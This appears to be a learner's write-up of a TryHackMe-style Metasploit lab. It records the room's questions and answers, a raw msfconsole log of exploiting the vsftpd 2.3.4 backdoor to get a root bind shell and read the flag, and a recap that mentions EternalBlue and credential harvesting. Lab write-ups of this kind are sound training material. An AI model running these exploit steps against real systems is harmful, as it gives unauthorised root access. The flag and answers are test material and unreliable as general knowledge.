What Metasploit module exploits the vsftpd 2.3.4 backdoor? exploit/unix/ftp/vsftpd_234_backdoor

msf exploit(unix/ftp/vsftpd_234_backdoor) > unset -g payload
Unsetting payload...

What user are you running as on stratford-srv01 after exploitation? root

msf exploit(unix/ftp/vsftpd_234_backdoor) > set payload generic/shel_bind_tcp
[-] The value specified for payload is not valid.
msf exploit(unix/ftp/vsftpd_234_backdoor) > set RPORT 6200
RPORT => 6200
msf exploit(unix/ftp/vsftpd_234_backdoor) > exploit
[*] Started reverse TCP handler on 10.114.98.170:4444 
[*] 10.114.157.64:6200 - Running automatic check ("set AutoCheck false" to disable)
[-] 10.114.157.64:6200 - Exploit failed [unreachable]: Rex::ConnectionRefused The connection was refused by the remote host (10.114.157.64:6200).
[*] Exploit completed, but no session was created.
msf exploit(unix/ftp/vsftpd_234_backdoor) > unset RPORT 6200
Unsetting RPORT...
Unsetting 6200...
[!] Variable "RPORT" unset - but will use a default value still. If this is not desired, set it to a new value or attempt to clear it with set --clear RPORT
msf exploit(unix/ftp/vsftpd_234_backdoor) > set RPORT 21
RPORT => 21
msf exploit(unix/ftp/vsftpd_234_backdoor) > set payload generic/shell_bind_tcp
payload => generic/shell_bind_tcp
msf exploit(unix/ftp/vsftpd_234_backdoor) > exploit
[*] 10.114.157.64:21 - Running automatic check ("set AutoCheck false" to disable)
[*] 10.114.157.64:21 - FTP banner hints its vulnerable: 220 (vsFTPd 2.3.4)
[+] 10.114.157.64:21 - The target appears to be vulnerable. vsftpd 2.3.4 banner detected; backdoor may be present
[+] 10.114.157.64:21 - Backdoor has been spawned!
[*] Started bind TCP handler against 10.114.157.64:4444
[*] Command shell session 2 opened (10.114.98.170:43841 -> 10.114.157.64:4444) at 2026-05-25 19:51:33 +0000

id
uid=0(root) gid=0(root) groups=0(root)
whoami
root
hostname
stratford-srv01

What are the contents of /root/flag.txt?

ls
bin
bin.usr-is-merged
boot
core
dev
etc
home
juziKAARAev
lib
lib.usr-is-merged
lib32
lib64
libx32
lost+found
media
mnt
opt
proc
root
run
sbin
sbin.usr-is-merged
snap
srv
sys
tmp
usr
var
cat /root/flag.txt
THM-MSFv3n0m-PAYLOAD

Conclusion

In this room, you took the foundational skills from the Introduction room and applied them against live targets on the Stratford Systems network. Let's recap the workflow you practiced:

  1. Scanning: You used Metasploit's built-in port scanning modules and Nmap (both directly and via db_nmap) to discover open ports and identify running services across two target hosts.

  2. Database management: You set up and used the Metasploit database to store scan results, query hosts and services, manage credentials, and automatically populate module parameters with hosts -R and services -R. Workspaces let you isolate engagement data cleanly.

  3. Vulnerability identification: You ran targeted scanner modules, confirmed that STRATFORD-WS01 was vulnerable to MS17-010, and identified the vsftpd 2.3.4 backdoor on both hosts. Results were automatically recorded in the database's vulns table.

  4. Exploitation: You exploited two fundamentally different vulnerabilities, a Windows SMB buffer overflow (EternalBlue) and a Linux FTP backdoor (vsftpd 2.3.4), using the same operational pattern. You gained SYSTEM-level access on Windows and root on Linux, retrieved a flag, and extracted password hashes.

The most important takeaway from this room is not any single command or module. It is the pattern: scan → store → identify → exploit. That four-step cycle applies to every Metasploit engagement, regardless of the target OS, protocol, or vulnerability type.

You now have two active sessions on the Stratford network: a Meterpreter session on STRATFORD-WS01 and a command shell on stratford-srv01. In the next room, Metasploit: Post-Exploitation, you will learn what to do with those sessions: post-exploitation commands, privilege management, credential harvesting, file system exploration, and more.

It is time to move on to the next room: Metasploit: Post-Exploitation.